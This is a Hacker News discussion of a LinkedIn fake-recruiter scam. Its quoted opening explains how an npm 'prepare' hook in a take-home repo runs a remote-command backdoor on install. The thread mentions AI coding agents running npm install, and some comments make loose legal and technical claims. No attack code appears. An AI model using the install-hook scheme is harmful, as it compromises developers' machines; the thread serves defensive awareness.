> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
Surprise is unwarranted as LinkedIn enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
Friends don't let friends use npm. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. pnpm and block one of the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
I know you are joking, but there is something about this that I really don't get. "Friends" here really means "a professional network". Many nerds despise having one or maintaining/building one. At the same time, people pour weeks/months/years of their life into optimizing their modest investment portfolios. 0.01 percentage points of yearly cost differences of some passive ETF. That surely compounds. But you know what also compounds? Knowing somebody who knows somebody who has $skill or $job_posting. In a big way. Your work comp is still the biggest source of income for most, but investing into optimizing it by broadening your network is something people don't want to do. They'd rather discuss the tax implications of nuances of some investment portfolio.
I don't disagree, but broadening your network is a very different skill (being social) than handling investment portfolios. And for some of us, it's not that we necessarily despise creating or maintaining a network, it's that we suck at it.
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being run.
Bigger issue is giant, inscrutable dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
Claude Code regularly installs dependencies using (p)npm after I e.g. pull a company main branch to get in sync with my teammates. That happens often. So I pull, Claude edits some code as you requested and it should pass because Claude did alright, but your local box has out-of-date deps. So then Claude runs (p)npm i and now we have automatic exploitation of this gaping hole in npm given extremely common and current AI tooling. Someone has to figure out how to stop AI from running that command or NPM needs to stop that behavior, and I guarantee you it will be easier to get one tool to change than all AI.
The lockfile should protect you there. It'd only be an issue if you're working on updating dependencies in which case there's other protection like min-release-age
If pulling down your company repo and running `npm install` can lead to a compromise, something has gone terribly wrong with your company's security setup.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
I have the same. The difference is, if you do email verification, you will get "verified" status. If not, you can still add the company to your LinkedIn, just unverified, which is not a label.
Email domains of employee addresses aren't necessarily owned by the company. For example:
- a startup with legacy personal email addresses from one or two universities
- a spin-off sharing the email domain (and the whole IT infrastructure) of the parent company
- cheapskates using six approved free email services
For security purposes, on the other hand, the important part is proving that the LinkedIn account is owned by the organization.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily involves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostilles, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
Brazilian law, for instance, defines the crimes of passive and active corruption:
The Penal Code, in Article 317, defines the crime of passive corruption as "soliciting or receiving, for oneself or for others, directly or indirectly, even if outside the function or before assuming it, an undue advantage, or accepting a promise of such an advantage." [0]
Active corruption, committed by an outsider, who offers or promises an undue advantage, is provided for in Article 333 of the Brazilian Penal Code. [1]
But, granted, reviewing US and UK law, it seems they don't define "corruption" as a crime (albeit some of the act names do mention corruption). So let's fall back onto the dictionary: [2]
a: dishonest or illegal behavior especially by powerful people (such as government officials or police officers) : depravity
b: inducement to wrong by improper or unlawful means (such as bribery)
c: a departure from the original or from what is pure or correct
Both definition a and c are too ample and, as you put it, "a smorgasbord". Definition b, especially when combined with a, describes something pretty specific: inducement of a powerful agent to wrong by improper or unlawful means, such as bribes.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange of personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
That sure is an interesting take from someone with "anarchist" in their username. IMHO corruption is any time you use power/influence/station in order to skew the normal well-behaved channels of governance (cybernetics) for personal gain. Any system with hierarchy can have corruption. Bernie Madoff was an example of illegal, private industry corruption.
I agree with you. I used to work for an ISP that sold kind-of overpriced 1Gbps connections and always wondered why customers bought it. Probably helping things was that we took them out to "events", floor seats at basketball, etc. The company just has a fixed expense, but the people making the decision get free stuff that makes them feel important, and it was kind of a way of transferring the company's money (by not buying the $29/month Internet connection) to themselves. I never felt good about it, but if you say that out loud, everyone will look at you like you're crazy.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
Vendor bribe swag is basically ubiquitous in the industrial world. When I worked in oil and gas it was quite common for a vendor to do a 'lunch and learn' where they bought the whole office very good lunch and we listened to them pitch whatever product line they wanted us to specify for design customers. I work in a more socially responsible but less lucrative industry now and alas no vendors buying me lunch
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
> got it solved by buying drinks for a buddy of mine that works for LinkedIn
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
I know it is only a partial solution, but I saw with some companies that LinkedIn provides a way to verify a user works at such a company. This is done via sending an email to a company domain email address (supposedly yours that you provide), and then approving it from your work laptop. I guess the administrators of the company account on LinkedIn can determine which domains are allowed for this.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I'm in all the shittiest of spam lists for eternity. I don't know how they even harvest emails from LinkedIn.
This is from 2016. At the time they had ~400 million users, and the breach was 164 million. Now it's close to 1.5B.
People these days use aggregators like Apollo, signal hire, apify. There are 1000s of such tools.
I had it several years ago when I was running my own one-man consultancy [ie: self-employed] ... somehow I'd managed to have six or seven people on LI claiming to work for the same company.
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
<I wonder if a cease and desist to their legal department would work better?>
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometimes makes you wonder if LinkedIn & the like are even worth it
Things like this were a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
It’s been this bad for a little while, iirc have seen a few of these pop up over the last few years. And that’s just for the few someone’s caught/documented
I've been freelancing for over a decade. This stuff is every third crypto related job. They're all malware repos running scripts the moment you turn on vscode hoovering up everything they can on your computer.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
while working at a Fortune 500 MNC, gig before this one, I used to get LinkedIn hits from recruiters.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
Job candidates keep facing a lot of hurdles, including scams, Trojan horses like the one presented here, ghosting, wasting candidates' time, nepotism, etc. As a candidate you can easily spend more than 8 hours a day looking for opportunities, switching stacks, studying, doing take-home projects, etc, for absolutely nothing. Life is precious and shouldn't be burned like that!
> Life is precious and shouldn't be burned like that
Very true. I remember when I was job hunting for 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
It is absolutely the worst. Also the feeling that this task of job searching is supremely important. You feel guilty doing anything that isn’t job searching. Meeting friends? Spending money while you aren’t making any? Seems irresponsible internally. When your day fills with stuff that isn’t job searching it makes you feel that day was a failure. Even when you do job search and you have say a month without any bites, it also makes you feel that month was a failure. You feel like you are wasting your life. At least when you had a job, that time spent counted for a little more experience. Every second without a job feels like it counts against you. You feel like a leper. Look at me who failed to secure a job, I must be a failure, you think internally.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Sounds like socializing the harms instead of requiring these companies to bear the burden themselves. Could still be a valid approach but I'm afraid it will make them take less responsibility, not more.
Something I've always wondered, because I'm a bit of a contrarian and I wonder if we're really any different: Could an American citizen hack and steal from Iranians and Russians with impunity from America? The issues that prevent the US from extraditing Russians who hack us -- don't they work both ways?
Legally speaking, no - it would still be a criminal offence.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a big difference between targeting IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
It would be very dependent on the exact circumstances - who made a complaint, what exactly they're accusing you of, what evidence there is, how high profile it is, the current diplomatic position (which changes by the hour), etc, etc. I don't think you can really get a simple answer for this kind of question.
As far as I know it has never happened. On the contrary, when Alejandro Caceres admitted to ddosing North Korea - taking down all their public websites for a week - he was questioned by the FBI who decided to take no further action.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
I don’t know but the US kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be acted upon…
You aren't getting jail for life for this, even in the extremely remote chance you are caught. You are probably getting more than one guy's computer, though.
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we have scammers, because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
I'm in the US, I have two 20-year old phone numbers and 1 cell number, none ring through with spam or scams.
I wonder why that is? I don't give the numbers out. That's why. Whenever a store says "do you have a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that don't tie prices to your having given them a number.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not an insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
The behavior of the phone network is set by government regulation. If you refuse to service allowable calls, you are heavily fined or kicked off the network. The government has to update the rules.
I'd be 100% happy to block those carriers from calling me. Their users should just get a message that calling my number is not supported and they should try calling me from another device.
Not allowed. The same government rules that stop Google from refusing calls from Apple devices also stop them from refusing calls from whoever is doing this. The government would have to update the rules. They could mandate number verification for all calls, even those passing over TDM trunks, and make it the network's problem to figure out how to do that. The rules currently say that all calls which don't pass through legacy equipment must have verified numbers, so there's a market for making calls take stupid legacy routes on purpose.
I always wondered why the US cannot pressure India to crack down on those scammers? They use the phone network, it should not be difficult to find them. Some youtubers even hack into their computers and extract all the info. The US probably has leverage here, they could simply ban Indian companies from working with the US if they don't cooperate.
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
There is, but the FBI is horrible at responding to cybercrime. They have IC3 but it's basically useless. They aren't going to help or even contact you if you report a crime to them.
The amount of crime in the world -that requires arguably "low skill" time to resolve- that just gets filed away because of low resources is insane. How are forces going to stand up high skill task forces for these kinds of things?
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
I don't want to be cynical, but maybe spending hours every day using Claude has made some of us particularly attuned to picking this up. For some reason as soon as I read "The trap was in app/test/index.js," I instantly knew it was Claude. It's too bad, because there will obviously be some false positives, but it makes me immediately disregard the author.
I sometimes use the Claude app with text to speech enabled. It’s got a quite distinctive voice/tempo combo when it’s outputting speech.
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
This type of attack has been happening a lot the past 2 years. I've seen one that was very well done...the GitHub account of a fairly well known security researcher had been compromised...their identity and code was being used as part of the recruitment. I reached out to the person...who was understandably embarrassed and told me they had reported this to LinkedIn + GitHub but saw no action.
This is the part that really irks me: LinkedIn and GitHub know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit by this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Call it a conspiracy theory, but I think a lot of these businesses actively avoid making serious efforts because even trying creates expectations. Ones that they don’t want to be on the hook for.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
> they investigated and didn’t find any violation of their policies.
When my YT Premium lapsed, 70% of the ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policies. The remaining 30% were straight up foreign state-level propaganda; those I didn't even bother to report.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seem to get worse, not better, as Microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Same story for me. I gave them the repo link and messages. Nothing 2 weeks later. Now I just block them and even then, you can't select a proper reason (there's no "other" field for a block), so I just say they're impersonating someone and leave it at that. We cannot let this become the primary site for job postings.
A skilled employee would never skip that step, why should you do so in an interview context? Skipping that step seems like a task failure to me just as much as any other part of the question from an interviewer perspective. Maybe I shouldn't hire the guy that blindly runs code just because someone "senior" to them asks.
Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bells start ringing when they insist that you run their sh*t locally.
Similar for me. One was for an overly well-paid position. I always run (p)npm audit before running npm repos, so lots of issues were found. I tried to fix them but I would have gone over the time limit. So I asked the recruiter about it and whether it made sense to run it in an isolated VM. No answer...
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
this happened to me too. few things about the process made me suspicious. i downloaded the repo and told claude to "find the malware". took about 15 seconds. remote code execution that would have run upon npm install, iirc. many layers of obfuscation. in implementation, a little different to the op's situation but there are similarities. it was a "crypto startup". maybe they think people in crypto world are more forgiving of idiosyncrasies in the recruiting process? i reported the recruiter's profile to linkedin, with extensive details. they said they wouldn't look into it unless i opened a ticket in some other part of their site, lol. however it seems they got onto it, or someone else complained, because i can't find the recruiter "alice kenny" anymore. but the "company" she was recruiting for is still live:
I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
So fed it to qwen. It seems to think it's just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Because uh every OS on earth has the exact same vulnerabilities? How are you supposed to stop a user from downloading something random from the internet and running it?
Sometimes, but nodejs or npm won't work properly without the headless chromium VM, and would need bypassing local file-access security-sandbox restrictions most normal system Web-browsers enforce by default.
If root installs OS-supported VM packages, then it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
npm is hard to avoid, as other ecosystems have integrated it as a cross-platform build/installer script bootstrap.
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
If a build tool has any support for tests, it can execute arbitrary code, since that is what tests are. I am quite sure Maven's pom.xml can install binary jar into local .m2/repository, and later use it as plugin during generate-sources phase - and that is something an IDE will want to do when opening project.
NPM attacks are really a product of its popularity (and the update churn the community has already got used to).
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
I'm not sure if anyone will read this, but I consider myself pretty savvy, having been on the internet for decades; however, I nearly succumbed to a highly complex LinkedIn "interview with video call just to get me to install malware".
It was the most bizarrely long, roundabout way to get me to install malware I had ever witnessed; I couldn't fathom it was real, I mean they interviewed me for half an hour. Now you might think I'm paranoid, however it was obvious: their camera was off (personal preference, they said) and well, I allowed it... only for other eventual straws to break the camel's back, and I realised "oh, uh oh, this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flummoxed tbh, I couldn't believe it, as the approach had been very organic, through LinkedIn DMs; just that eventually I realised I had succumbed to "yes men" (the only thing that would get past my already strict job filters, ironically) to allow myself into such a compromising situation.
The only question I had is how did they do such a smooth, complex manoeuvre, and then I realised... oh, they just used AI to come up with the plan and implementation.
This is a common one. I've had at least half a dozen of them. If I'm bored, I play along, and then play difficult and dumb and see how long it takes until they give up.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
A long time ago, I worked for an ISP that sent out the famous "we'll never ask for your passwords" email. Then, about 3 weeks in, they sent out emails asking people for their passwords. If you told me that this was a happy ending, he sent in a check and they sent a laptop and after 2 paychecks released his deposit, I wouldn't be shocked. Some companies are run by idiots. I even know that most companies could probably cover scammed hardware with business insurance, but then I wonder how many flying-by-the-seat-of-their-pants outfits don't have the insurance.
My favorite was a job posting through a company called ladders
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
I work in crypto and this is happening practically every other day. I refuse anyone on LinkedIn that I don't know personally and who has web3 or crypto anywhere in the description. It's all fake accounts with fake job offers. It's a pretty well-known scam.
Worth noting that this isn't just a risk with npm or other package managers. If you're using LLM agents in the directory of a cloned repo, there are risks in skills, hooks etc. automatically executing..
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
I cannot imagine a situation where some random person messages me on LinkedIn asking me to solve a coding challenge, and I do anything other than block them.
I'm guessing you've never experienced the enormous pressure of needing to find a job to buy food and clothes for your family. That's good, I'm glad that you don't know that feeling. But if you did, you'd know how easy it could be for a person to start feeling more and more desperate for any kind of lifeline.
There is still no chance that my first reaction to a random stranger asking me to do work for them is "sure", without building some sort of connection. Granted, that means I could still get phished via a coding exercise, but it would require a bit more effort on the attacker's part.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Martin from GitHub here - the offending repos have been taken down, but the article from Roman is still very much worth reading to understand the attack vector attempted.
I'm seeing the same. Worth flagging that maintainers seem to be a specific target now, not just job seekers. If you've got commit access to anything popular, backdoors like this become a lot more dangerous, because the supply-chain payoff is much bigger than your laptop
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
> I’ve heard of these attacks and read about them on HN
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain, but this is the first time I've come across this pattern. Eye opening indeed.
